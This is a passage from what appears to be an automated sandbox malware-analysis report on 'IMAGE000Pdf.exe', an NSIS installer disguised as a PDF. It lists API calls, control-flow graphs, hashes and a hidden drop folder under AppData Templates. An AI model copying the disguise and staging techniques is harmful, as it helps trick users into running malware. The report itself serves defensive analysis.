                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                      • String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods\Minkfarms$C:\Users\user\Desktop$C:\Users\user\Desktop\IMAGE000Pdf.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                      • API String ID: 3441113951-1974407356
                                      • Opcode ID: 548301c1dfa22215a8893450befa883167be07a4132e0a9c717a82b6bd7fd6f7
                                      • Instruction ID: d7b9bf8e5ec5db16f392776339999e6c5d6af7d7718e861a4dfbc7241a8cc938
                                      • Opcode Fuzzy Hash: 548301c1dfa22215a8893450befa883167be07a4132e0a9c717a82b6bd7fd6f7
                                      • Instruction Fuzzy Hash: 65D1F6B1200310AAD7207F659D49B2B3AACEB81749F10843FF581B62D1DB7D8A55C76E

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 385 405b00-405b26 call 405dcb 388 405b28-405b3a DeleteFileW 385->388 389 405b3f-405b46 385->389 390 405cbc-405cc0 388->390 391 405b48-405b4a 389->391 392 405b59-405b69 call 4063ee 389->392 393 405b50-405b53 391->393 394 405c6a-405c6f 391->394 400 405b78-405b79 call 405d0f 392->400 401 405b6b-405b76 lstrcatW 392->401 393->392 393->394 394->390 396 405c71-405c74 394->396 398 405c76-405c7c 396->398 399 405c7e-405c86 call 40674c 396->399 398->390 399->390 409 405c88-405c9c call 405cc3 call 405ab8 399->409 404 405b7e-405b82 400->404 401->404 405 405b84-405b8c 404->405 406 405b8e-405b94 lstrcatW 404->406 405->406 408 405b99-405bb5 lstrlenW FindFirstFileW 405->408 406->408 410 405bbb-405bc3 408->410 411 405c5f-405c63 408->411 425 405cb4-405cb7 call 405456 409->425 426 405c9e-405ca1 409->426 413 405be3-405bf7 call 4063ee 410->413 414 405bc5-405bcd 410->414 411->394 416 405c65 411->416 427 405bf9-405c01 413->427 428 405c0e-405c19 call 405ab8 413->428 417 405c42-405c52 FindNextFileW 414->417 418 405bcf-405bd7 414->418 416->394 417->410 424 405c58-405c59 FindClose 417->424 418->413 421 405bd9-405be1 418->421 421->413 421->417 424->411 425->390 426->398 431 405ca3-405cb2 call 405456 call 4061b4 426->431 427->417 432 405c03-405c07 call 405b00 427->432 436 405c3a-405c3d call 405456 428->436 437 405c1b-405c1e 428->437 431->390 439 405c0c 432->439 436->417 440 405c20-405c30 call 405456 call 4061b4 437->440 441 405c32-405c38 437->441 439->417 440->417 441->417
                                      APIs
                                      • DeleteFileW.KERNELBASE(?,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B29
                                      • lstrcatW.KERNEL32(007A3F50,\*.*,007A3F50,?), ref: 00405B71
                                      • lstrcatW.KERNEL32(?,0040A014,?,007A3F50,?), ref: 00405B94
                                      • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?), ref: 00405B9A
                                      • FindFirstFileW.KERNELBASE(007A3F50,?,?,?,0040A014,?,007A3F50,?), ref: 00405BAA
                                      • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405C4A
                                      • FindClose.KERNEL32(00000000), ref: 00405C59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                                      • API String ID: 2035342205-2074300625
                                      • Opcode ID: 2e078cdcde706d48225d83f3244a5f4697d9a3fc09f8fc82c0d1a14fe090b8d5
                                      • Instruction ID: d176cfcb2707c6ba555092c79fa60715814496245c058da0d6595325efdb1864
                                      • Opcode Fuzzy Hash: 2e078cdcde706d48225d83f3244a5f4697d9a3fc09f8fc82c0d1a14fe090b8d5
                                      • Instruction Fuzzy Hash: BE41D530804A15AAEB216B658D89EBF7678EF42715F14813FF801711D2DB7C5E82CE6E
                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,007A4F98,C:\,00405E14,C:\,C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F93420,C:\Users\user\AppData\Local\Temp\), ref: 00406757
                                      • FindClose.KERNEL32(00000000), ref: 00406763
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID: C:\
                                      • API String ID: 2295610775-3404278061
                                      • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                      • Instruction ID: 5230d556015edc92dacd95909e5542708b333c59f405b635cf09ddc887f28092
                                      • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                      • Instruction Fuzzy Hash: CCD012315192205FC75027386F0C84B7A599F567353264B36F0AAF21E0C6788C3286AC

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 139 403e6b-403e7d 140 403e83-403e89 139->140 141 403fbe-403fcd 139->141 140->141 142 403e8f-403e98 140->142 143 40401c-404031 141->143 144 403fcf-404017 GetDlgItem * 2 call 404344 SetClassLongW call 40140b 141->144 147 403e9a-403ea7 SetWindowPos 142->147 148 403ead-403eb0 142->148 145 404071-404076 call 404390 143->145 146 404033-404036 143->146 144->143 161 40407b-404096 145->161 150 404038-404043 call 401389 146->150 151 404069-40406b 146->151 147->148 153 403eb2-403ec4 ShowWindow 148->153 154 403eca-403ed0 148->154 150->151 172 404045-404064 SendMessageW 150->172 151->145 160 404311 151->160 153->154 156 403ed2-403ee7 DestroyWindow 154->156 157 403eec-403eef 154->157 162 4042ee-4042f4 156->162 165 403ef1-403efd SetWindowLongW 157->165 166 403f02-403f08 157->166 164 404313-40431a 160->164 168 404098-40409a call 40140b 161->168 169 40409f-4040a5 161->169 162->160 174 4042f6-4042fc 162->174 165->164 170 403fab-403fb9 call 4043ab 166->170 171 403f0e-403f1f GetDlgItem 166->171 168->169 175 4040ab-4040b6 169->175 176 4042cf-4042e8 DestroyWindow EndDialog 169->176 170->164 178 403f21-403f38 SendMessageW IsWindowEnabled 171->178 179 403f3e-403f41 171->179 172->164 174->160 181 4042fe-404307 ShowWindow 174->181 175->176 177 4040bc-404109 call 40642b call 404344 * 3 GetDlgItem 175->177 176->162 209 404113-40414f ShowWindow KiUserCallbackDispatcher call 404366 EnableWindow 177->209 210 40410b-404110 177->210 178->160 178->179 183 403f43-403f44 179->183 184 403f46-403f49 179->184 181->160 187 403f74-403f79 call 40431d 183->187 188 403f57-403f5c 184->188 189 403f4b-403f51 184->189 187->170 192 403f92-403fa5 SendMessageW 188->192 194 403f5e-403f64 188->194 189->192 193 403f53-403f55 189->193 192->170 193->187 197 403f66-403f6c call 40140b 194->197 198 403f7b-403f84 call 40140b 194->198 205 403f72 197->205 198->170 207 403f86-403f90 198->207 205->187 207->205 213 404151-404152 209->213 214 404154 209->214 210->209 215 404156-404184 GetSystemMenu EnableMenuItem SendMessageW 213->215 214->215 216 404186-404197 SendMessageW 215->216 217 404199 215->217 218 40419f-4041de call 404379 call 403e4c call 4063ee lstrlenW call 40642b SetWindowTextW call 401389 216->218 217->218 218->161 229 4041e4-4041e6 218->229 229->161 230 4041ec-4041f0 229->230 231 4041f2-4041f8 230->231 232 40420f-404223 DestroyWindow 230->232 231->160 233 4041fe-404204 231->233 232->162 234 404229-404256 CreateDialogParamW 232->234 233->161 235 40420a 233->235 234->162 236 40425c-4042b3 call 404344 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 234->236 235->160 236->160 241 4042b5-4042c8 ShowWindow call 404390 236->241 243 4042cd 241->243 243->162
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA7
                                      • ShowWindow.USER32(?), ref: 00403EC4
                                      • DestroyWindow.USER32 ref: 00403ED8
                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF4
                                      • GetDlgItem.USER32(?,?), ref: 00403F15
                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F29
                                      • IsWindowEnabled.USER32(00000000), ref: 00403F30
                                      • GetDlgItem.USER32(?,00000001), ref: 00403FDE
                                      • GetDlgItem.USER32(?,00000002), ref: 00403FE8
                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404002
                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404053
                                      • GetDlgItem.USER32(?,00000003), ref: 004040F9
                                      • ShowWindow.USER32(00000000,?), ref: 0040411A
                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412C
                                      • EnableWindow.USER32(?,?), ref: 00404147
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415D
                                      • EnableMenuItem.USER32(00000000), ref: 00404164
                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417C
                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040418F
                                      • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004041B9
                                      • SetWindowTextW.USER32(?,007A1F48), ref: 004041CD
                                      • ShowWindow.USER32(?,0000000A), ref: 00404301
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                      • String ID:
                                      • API String ID: 3282139019-0
                                      • Opcode ID: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                      • Instruction ID: fd8a01c06953bfbcdc6c7a7ca4fde1a241a6ed83f8ebcdeac2000881ab9a06ac
                                      • Opcode Fuzzy Hash: f1a328e51306031731dbcce9d1c3737ebdd7014b04a9a2d8d616989602e21706
                                      • Instruction Fuzzy Hash: 67C1BFB1604604AFDB206F61ED85D2A3B78EBCA705B10853EF651B11F0CB3D9941DB6E

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 244 403abd-403ad5 call 4067e3 247 403ad7-403ae7 call 406335 244->247 248 403ae9-403b20 call 4062bc 244->248 257 403b43-403b6c call 403d93 call 405dcb 247->257 253 403b22-403b33 call 4062bc 248->253 254 403b38-403b3e lstrcatW 248->254 253->254 254->257 262 403b72-403b77 257->262 263 403bfe-403c06 call 405dcb 257->263 262->263 264 403b7d-403ba5 call 4062bc 262->264 269 403c14-403c39 LoadImageW 263->269 270 403c08-403c0f call 40642b 263->270 264->263 271 403ba7-403bab 264->271 273 403cba-403cc2 call 40140b 269->273 274 403c3b-403c6b RegisterClassW 269->274 270->269 275 403bbd-403bc9 lstrlenW 271->275 276 403bad-403bba call 405cf0 271->276 288 403cc4-403cc7 273->288 289 403ccc-403cd7 call 403d93 273->289 277 403c71-403cb5 SystemParametersInfoW CreateWindowExW 274->277 278 403d89 274->278 282 403bf1-403bf9 call 405cc3 call 4063ee 275->282 283 403bcb-403bd9 lstrcmpiW 275->283 276->275 277->273 281 403d8b-403d92 278->281 282->263 283->282 287 403bdb-403be5 GetFileAttributesW 283->287 292 403be7-403be9 287->292 293 403beb-403bec call 405d0f 287->293 288->281 297 403d60-403d68 call 405529 289->297 298 403cdd-403cf7 ShowWindow call 406773 289->298 292->282 292->293 293->282 303 403d82-403d84 call 40140b 297->303 304 403d6a-403d70 297->304 305 403d03-403d15 GetClassInfoW 298->305 306 403cf9-403cfe call 406773 298->306 303->278 304->288 307 403d76-403d7d call 40140b 304->307 310 403d17-403d27 GetClassInfoW RegisterClassW 305->310 311 403d2d-403d50 DialogBoxParamW call 40140b 305->311 306->305 307->288 310->311 315 403d55-403d5e call 403a0d 311->315 315->281
                                      APIs
                                        • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                        • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                      • lstrcatW.KERNEL32(1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000), ref: 00403B3E
                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76F93420), ref: 00403BBE
                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403BD1
                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403BDC
                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods), ref: 00403C25
                                        • Part of subcall function 00406335: wsprintfW.USER32 ref: 00406342
                                      • RegisterClassW.USER32(007A7A00), ref: 00403C62
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7A
                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CAF
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403CE5
                                      • GetClassInfoW.USER32(00000000,RichEdit20W,007A7A00), ref: 00403D11
                                      • GetClassInfoW.USER32(00000000,RichEdit,007A7A00), ref: 00403D1E
                                      • RegisterClassW.USER32(007A7A00), ref: 00403D27
                                      • DialogBoxParamW.USER32(?,00000000,00403E6B,00000000), ref: 00403D46
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\struldbrug\bentwoods$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                      • API String ID: 1975747703-2312106957
                                      • Opcode ID: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                      • Instruction ID: 7ce8ec14a48fa11d69b3a5e1f0875b7083b8d607cd9ed6182ea3b60f82ca9994
                                      • Opcode Fuzzy Hash: ed5882197ad2af45622ab53baadaf8c7f939305731a510e2915a0577b65485f7
                                      • Instruction Fuzzy Hash: 286193702407007ED320AB669D46F2B3A7CEB85B49F40853FF941B22E2DB7D99018B6D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 318 403015-403063 GetTickCount GetModuleFileNameW call 405ee4 321 403065-40306a 318->321 322 40306f-40309d call 4063ee call 405d0f call 4063ee GetFileSize 318->322 323 403245-403249 321->323 330 4030a3 322->330 331 403188-403196 call 402fb1 322->331 333 4030a8-4030bf 330->333 337 403198-40319b 331->337 338 4031eb-4031f0 331->338 335 4030c1 333->335 336 4030c3-4030cc call 403444 333->336 335->336 344 4031f2-4031fa call 402fb1 336->344 345 4030d2-4030d9 336->345 340 40319d-4031b5 call 40345a call 403444 337->340 341 4031bf-4031e9 GlobalAlloc call 40345a call 40324c 337->341 338->323 340->338 368 4031b7-4031bd 340->368 341->338 366 4031fc-40320d 341->366 344->338 350 403155-403159 345->350 351 4030db-4030ef call 405e9f 345->351 355 403163-403169 350->355 356 40315b-403162 call 402fb1 350->356 351->355 365 4030f1-4030f8 351->365 362 403178-403180 355->362 363 40316b-403175 call 4068d0 355->363 356->355 362->333 367 403186 362->367 363->362 365->355 371 4030fa-403101 365->371 372 403215-40321a 366->372 373 40320f 366->373 367->331 368->338 368->341 371->355 374 403103-40310a 371->374 375 40321b-403221 372->375 373->372 374->355 376 40310c-403113 374->376 375->375 377 403223-40323e SetFilePointer call 405e9f 375->377 376->355 378 403115-403135 376->378 381 403243 377->381 378->338 380 40313b-40313f 378->380 382 403141-403145 380->382 383 403147-40314f 380->383 381->323 382->367 382->383 383->355 384 403151-403153 383->384 384->355
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00403026
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\IMAGE000Pdf.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                        • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                        • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                      • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMAGE000Pdf.exe,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                      • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                      • String ID: "C:\Users\user\Desktop\IMAGE000Pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\IMAGE000Pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                      • API String ID: 2803837635-3763178209
                                      • Opcode ID: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                      • Instruction ID: b65d07b499067b34cf8ea267e223a71d0fae98adc47698ec1498b1efb03bef53
                                      • Opcode Fuzzy Hash: 08ca265c2c11c7ade98783a519f9a0a5c073a42a03571b96a4881a179354b053
                                      • Instruction Fuzzy Hash: DD51D171900204ABDB119F64DD85B9E7EACEB45316F20843BE911BA2D1DB7C8F418B5D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 449 40642b-406436 450 406438-406447 449->450 451 406449-40645f 449->451 450->451 452 406465-406472 451->452 453 406677-40667d 451->453 452->453 456 406478-40647f 452->456 454 406683-40668e 453->454 455 406484-406491 453->455 457 406690-406694 call 4063ee 454->457 458 406699-40669a 454->458 455->454 459 406497-4064a3 455->459 456->453 457->458 461 406664 459->461 462 4064a9-4064e7 459->462 465 406672-406675 461->465 466 406666-406670 461->466 463 406607-40660b 462->463 464 4064ed-4064f8 462->464 467 40660d-406613 463->467 468 40663e-406642 463->468 469 406511 464->469 470 4064fa-4064ff 464->470 465->453 466->453 471 406623-40662f call 4063ee 467->471 472 406615-406621 call 406335 467->472 474 406651-406662 lstrlenW 468->474 475 406644-40664c call 40642b 468->475 473 406518-40651f 469->473 470->469 476 406501-406504 470->476 487 406634-40663a 471->487 472->487 478 406521-406523 473->478 479 406524-406526 473->479 474->453 475->474 476->469 482 406506-406509 476->482 478->479 485 406561-406564 479->485 486 406528-406546 call 4062bc 479->486 482->469 483 40650b-40650f 482->483 483->473 490 406574-406577 485->490 491 406566-406572 GetSystemDirectoryW 485->491 492 40654b-40654f 486->492 487->474 489 40663c 487->489 493 4065ff-406605 call 40669d 489->493 495 4065e2-4065e4 490->495 496 406579-406587 GetWindowsDirectoryW 490->496 494 4065e6-4065ea 491->494 497 406555-40655c call 40642b 492->497 498 4065ef-4065f2 492->498 493->474 494->493 500 4065ec 494->500 495->494 499 406589-406593 495->499 496->495 497->494 498->493 505 4065f4-4065fa lstrcatW 498->505 502 406595-406598 499->502 503 4065ad-4065c3 SHGetSpecialFolderLocation 499->503 500->498 502->503 507 40659a-4065a1 502->507 508 4065c5-4065dc SHGetPathFromIDListW 